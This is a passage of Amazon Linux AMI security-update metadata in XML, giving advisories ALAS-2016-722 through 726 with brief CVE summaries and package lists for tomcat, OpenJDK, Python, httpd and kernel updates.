arch="x86_64"><filename>Packages/varnish-debuginfo-3.0.7-1.20.amzn1.x86_64.rpm</filename></package><package name="varnish-debuginfo" version="3.0.7" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-debuginfo-3.0.7-1.20.amzn1.i686.rpm</filename></package><package name="varnish-libs" version="3.0.7" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-libs-3.0.7-1.20.amzn1.i686.rpm</filename></package><package name="varnish" version="3.0.7" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-3.0.7-1.20.amzn1.i686.rpm</filename></package><package name="varnish-libs-devel" version="3.0.7" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-libs-devel-3.0.7-1.20.amzn1.i686.rpm</filename></package><package name="varnish-docs" version="3.0.7" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-docs-3.0.7-1.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" 
version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-722</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-722: medium priority package update for tomcat6 tomcat7 tomcat8</title><issued date="2016-07-20 18:00:00" /><updated date="2016-07-20 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5388:
1353809:
CVE-2016-5388 Tomcat: CGI sets environmental variable based on user supplied Proxy request header
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5388" title="" id="CVE-2016-5388" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat6-lib" version="6.0.45" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-lib-6.0.45-1.5.amzn1.noarch.rpm</filename></package><package name="tomcat6-servlet-2.5-api" version="6.0.45" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-servlet-2.5-api-6.0.45-1.5.amzn1.noarch.rpm</filename></package><package name="tomcat6-admin-webapps" version="6.0.45" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-admin-webapps-6.0.45-1.5.amzn1.noarch.rpm</filename></package><package name="tomcat6-webapps" version="6.0.45" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-webapps-6.0.45-1.5.amzn1.noarch.rpm</filename></package><package name="tomcat6-docs-webapp" version="6.0.45" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-docs-webapp-6.0.45-1.5.amzn1.noarch.rpm</filename></package><package name="tomcat6-jsp-2.1-api" version="6.0.45" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-jsp-2.1-api-6.0.45-1.5.amzn1.noarch.rpm</filename></package><package name="tomcat6-el-2.1-api" version="6.0.45" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-el-2.1-api-6.0.45-1.5.amzn1.noarch.rpm</filename></package><package name="tomcat6" version="6.0.45" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-6.0.45-1.5.amzn1.noarch.rpm</filename></package><package name="tomcat6-javadoc" version="6.0.45" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-javadoc-6.0.45-1.5.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.69" release="1.17.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.69-1.17.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.69" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.69-1.17.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.69" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.69-1.17.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.69" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.69-1.17.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.69" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.69-1.17.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.69" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.69-1.17.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.69" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.69-1.17.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.69" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.69-1.17.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.69" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.69-1.17.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.69" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.69-1.17.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.0.35" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.35-1.61.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.35" release="1.61.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.35-1.61.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.0.35" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.35-1.61.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.35" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.0.35-1.61.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.35" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.35-1.61.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.0.35" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.35-1.61.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.0.35" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.35-1.61.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.35" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.35-1.61.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.35" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.35-1.61.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.0.35" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.35-1.61.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-723</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-723: critical priority package update for java-1.8.0-openjdk</title><issued date="2016-07-20 18:00:00" /><updated date="2016-07-20 18:00:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix 
the following vulnerabilities:
CVE-2016-3610:
1356994:
CVE-2016-3610 OpenJDK: insufficient value count check in MethodHandles.filterReturnValue() (Libraries, 8158571)
CVE-2016-3606:
1356963:
CVE-2016-3606 OpenJDK: insufficient bytecode verification (Hotspot, 8155981)
CVE-2016-3598:
1356971:
CVE-2016-3598 OpenJDK: incorrect handling of MethodHandles.dropArguments() argument (Libraries, 8155985)
CVE-2016-3587:
1356987:
CVE-2016-3587 OpenJDK: insufficient protection of MethodHandle.invokeBasic() (Hotspot, 8154475)
CVE-2016-3550:
1357506:
CVE-2016-3550 OpenJDK: integer overflows in bytecode streams (Hotspot, 8152479)
CVE-2016-3508:
1357015:
CVE-2016-3508 OpenJDK: missing entity replacement limits (JAXP, 8149962)
CVE-2016-3500:
1357008:
CVE-2016-3500 OpenJDK: maximum XML name limit not applied to namespace URIs (JAXP, 8148872)
CVE-2016-3458:
1357494:
CVE-2016-3458 OpenJDK: insufficient restrictions on the use of custom ValueHandler (CORBA, 8079718)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3458" title="" id="CVE-2016-3458" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3500" title="" id="CVE-2016-3500" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3508" title="" id="CVE-2016-3508" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3550" title="" id="CVE-2016-3550" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3587" title="" id="CVE-2016-3587" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3598" title="" id="CVE-2016-3598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3606" title="" id="CVE-2016-3606" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3610" title="" id="CVE-2016-3610" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-headless" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.101-3.b13.24.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.101-3.b13.24.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.101-3.b13.24.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.101-3.b13.24.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.101" release="3.b13.24.amzn1" 
epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.101-3.b13.24.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.101-3.b13.24.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.101-3.b13.24.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.101-3.b13.24.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.101-3.b13.24.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.101-3.b13.24.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.101-3.b13.24.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.101-3.b13.24.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.101" release="3.b13.24.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.101-3.b13.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-724</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-724: 
medium priority package update for python26 python27 python34</title><issued date="2016-07-20 18:00:00" /><updated date="2016-07-20 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5699:
It was found that Python&#039;s httplib library (used by urllib, urllib2 and others) did not properly check HTTP header input in HTTPConnection.putheader(). An attacker could use this flaw to inject additional headers in a Python application that allows user-provided header names or values.
1303699:
CVE-2016-5699 python: http protocol stream injection attack
CVE-2016-5636:
A vulnerability was discovered in Python, in the built-in zipimporter. A specially crafted zip file placed in a module path such that it would be loaded by a later &quot;import&quot; statement could cause a heap overflow, leading to arbitrary code execution.
1345856:
CVE-2016-5636 python: Heap overflow in zipimporter module
CVE-2016-0772:
It was found that Python&#039;s smtplib library did not raise an exception if StartTLS failed to establish correctly in the SMTP.starttls() function. An attacker with the ability to launch an active man-in-the-middle attack could strip out the STARTTLS command without generating an exception in the Python SMTP client application, preventing the establishment of the TLS layer.
1303647:
CVE-2016-0772 python: smtplib StartTLS stripping attack
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0772" title="" id="CVE-2016-0772" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5636" title="" id="CVE-2016-5636" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5699" title="" id="CVE-2016-5699" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-libs" version="2.6.9" release="2.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-libs-2.6.9-2.86.amzn1.x86_64.rpm</filename></package><package name="python26-tools" version="2.6.9" release="2.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-tools-2.6.9-2.86.amzn1.x86_64.rpm</filename></package><package name="python26-test" version="2.6.9" release="2.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-test-2.6.9-2.86.amzn1.x86_64.rpm</filename></package><package name="python26-devel" version="2.6.9" release="2.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-devel-2.6.9-2.86.amzn1.x86_64.rpm</filename></package><package name="python26" version="2.6.9" release="2.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-2.6.9-2.86.amzn1.x86_64.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="2.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-debuginfo-2.6.9-2.86.amzn1.x86_64.rpm</filename></package><package name="python26-libs" version="2.6.9" release="2.86.amzn1" epoch="0" arch="i686"><filename>Packages/python26-libs-2.6.9-2.86.amzn1.i686.rpm</filename></package><package name="python26-tools" version="2.6.9" release="2.86.amzn1" epoch="0" arch="i686"><filename>Packages/python26-tools-2.6.9-2.86.amzn1.i686.rpm</filename></package><package name="python26-test" version="2.6.9" release="2.86.amzn1" epoch="0" 
arch="i686"><filename>Packages/python26-test-2.6.9-2.86.amzn1.i686.rpm</filename></package><package name="python26" version="2.6.9" release="2.86.amzn1" epoch="0" arch="i686"><filename>Packages/python26-2.6.9-2.86.amzn1.i686.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="2.86.amzn1" epoch="0" arch="i686"><filename>Packages/python26-debuginfo-2.6.9-2.86.amzn1.i686.rpm</filename></package><package name="python26-devel" version="2.6.9" release="2.86.amzn1" epoch="0" arch="i686"><filename>Packages/python26-devel-2.6.9-2.86.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.10" release="4.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.10-4.122.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.10" release="4.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.10-4.122.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.10" release="4.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.10-4.122.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.10" release="4.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.10-4.122.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.10" release="4.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.10-4.122.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.10" release="4.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.10-4.122.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.10" release="4.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.10-4.122.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.10" release="4.122.amzn1" epoch="0" 
arch="i686"><filename>Packages/python27-test-2.7.10-4.122.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.10" release="4.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.10-4.122.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.10" release="4.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.10-4.122.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.10" release="4.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.10-4.122.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.10" release="4.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.10-4.122.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.3" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.3-1.32.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.3" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.3-1.32.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.3" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.3-1.32.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.3" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.3-1.32.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.3" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.3-1.32.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.3" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.3-1.32.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.3" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.3-1.32.amzn1.i686.rpm</filename></package><package 
name="python34-test" version="3.4.3" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.3-1.32.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.3" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.3-1.32.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.3" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.3-1.32.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.3" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.3-1.32.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.3" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.3-1.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-725</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-725: important priority package update for httpd24 httpd</title><issued date="2016-07-20 18:00:00" /><updated date="2016-07-20 18:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5387:
It was discovered that httpd used the value of the Proxy header from HTTP requests to initialize the HTTP_PROXY environment variable for CGI scripts, which in turn was incorrectly used by certain HTTP client implementations to configure the proxy for outgoing HTTP requests. A remote attacker could possibly use this flaw to redirect HTTP requests performed by a CGI script to an attacker-controlled proxy via a malicious HTTP request.
1353755:
CVE-2016-5387 Apache HTTPD: sets environmental variable based on user supplied Proxy request header
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5387" title="" id="CVE-2016-5387" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24" version="2.4.23" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.23-1.65.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.23" release="1.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.23-1.65.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.23" release="1.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.23-1.65.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.23" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.23-1.65.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.23" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.23-1.65.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.23" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.23-1.65.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.23" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.23-1.65.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.23" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.23-1.65.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.23" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.23-1.65.amzn1.noarch.rpm</filename></package><package name="mod24_session" version="2.4.23" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.23-1.65.amzn1.i686.rpm</filename></package><package name="httpd24-devel" 
version="2.4.23" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.23-1.65.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.23" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.23-1.65.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.23" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.23-1.65.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.23" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.23-1.65.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.23" release="1.65.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.23-1.65.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.23" release="1.65.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.23-1.65.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.23" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.23-1.65.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.31" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.31-1.8.amzn1.x86_64.rpm</filename></package><package name="httpd-devel" version="2.2.31" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.31-1.8.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.31" release="1.8.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.31-1.8.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.31" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.31-1.8.amzn1.noarch.rpm</filename></package><package name="httpd-tools" version="2.2.31" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.31-1.8.amzn1.x86_64.rpm</filename></package><package 
name="httpd-debuginfo" version="2.2.31" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.31-1.8.amzn1.x86_64.rpm</filename></package><package name="httpd-debuginfo" version="2.2.31" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.31-1.8.amzn1.i686.rpm</filename></package><package name="httpd-tools" version="2.2.31" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.31-1.8.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.31" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.31-1.8.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.31" release="1.8.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.31-1.8.amzn1.i686.rpm</filename></package><package name="httpd-devel" version="2.2.31" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.31-1.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-726</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-726: medium priority package update for kernel</title><issued date="2016-08-01 13:30:00" /><updated date="2016-08-17 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5696:
net/ipv4/tcp_input.c in the Linux kernel before 4.7 does not properly determine the rate of challenge ACK segments, which makes it easier for man-in-the-middle attackers to hijack TCP sessions via a blind in-window attack.
1354708:
CVE-2016-5696 kernel: challenge ACK counter information disclosure.
CVE-2016-5244:
A vulnerability was found in the Linux kernel in function rds_inc_info_copy of file net/rds/recv.c. The last field &quot;flags&quot; of object &quot;minfo&quot; is not initialized. This can leak data previously at the flags location to userspace.
1343337:
CVE-2016-5244 kernel: Information leak in rds_inc_info_copy
CVE-2016-5243:
When issuing a netlink command, a leak of information from the stack memory area leading up to this function call was possible. An attacker could use this to determine stack information for use in a later exploit.
1343335:
CVE-2016-5243 kernel: Information leak in tipc_nl_compat_link_dump
CVE-2016-4470:
A flaw was found in the Linux kernel&#039;s keyring handling code, where in key_reject_and_link() an uninitialised variable would eventually lead to an arbitrary free address, which could allow an attacker to mount a use-after-free style attack.
1341716:
CVE-2016-4470 kernel: Uninitialized variable in request_key handling causes kernel crash in error handling path
CVE-2016-1237:
It was found that nfsd is missing a permissions check when setting an ACL on files; this may allow a local user to gain access to any file by setting a crafted ACL.
1350845:
CVE-2016-1237 kernel: Missing check for permissions when setting ACL
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1237" title="" id="CVE-2016-1237" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4470" title="" id="CVE-2016-4470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5243" title="" id="CVE-2016-5243" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5244" title="" id="CVE-2016-5244" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5696" title="" id="CVE-2016-5696" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.4.15" release="25.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.15-25.57.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.15" release="25.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.15-25.57.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.15" release="25.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.15-25.57.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.15" release="25.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.15-25.57.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.15" release="25.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.15-25.57.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.15" release="25.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.15-25.57.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.4.15" release="25.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.15-25.57.amzn1.x86_64.rpm</filename></package><package 
